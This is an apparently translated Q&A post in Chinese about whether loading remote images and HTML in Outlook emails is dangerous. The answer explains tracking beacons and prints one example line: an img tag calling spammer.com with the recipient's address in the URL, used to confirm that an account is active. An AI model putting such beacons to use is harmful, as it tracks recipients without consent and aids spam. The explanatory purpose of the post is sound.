在Outlook中,当我们收到来自未知来源的入站邮件时,邮件顶部的工具栏允许我们将发件人永久添加到安全发件人列表,或者一次性“下载内容”
各种各样的人都在设置“从任何来源自动下载”的配置......我们建议他们反对。
Microsoft网站声明HTML内容,脚本或图像可用作“信标”,以向电子邮件地址有效的人员Web服务器报告。
如果仅通过查看或预览,电子邮件可以POST到Web服务器,是否可以执行JS或其他恶意代码,如果以这种方式下载HTML /图像?
答案 0 :(得分:1)
不在电子邮件中显示图像更多的是您的电子邮件客户端采用的反垃圾邮件政策(现在大部分都是默认执行此操作)。
如果我要查找一堆活跃的电子邮件帐户,我可以使用以下格式随机发送邮件:
to: john@doe.com
message: <img src="http://spammer.com/verifyAccount.png?account=john@doe.com">
然后我可以在 spammer.com 设置我的网络服务器来记录收到的请求(同时提供图像),以便每次用户打开我的一封恶意电子邮件时我都可以确保用户处于活动状态,这样就可以避免在不活跃或不存在的帐户上浪费我的资源垃圾邮件。
但同样,它涉及政策问题,而不是安全威胁,对于电子邮件可能尝试加载的任何外部资源(例如样式表)也是如此。
JS通常甚至不能在邮件客户端中使用,因此也没有来自该方面的真正威胁。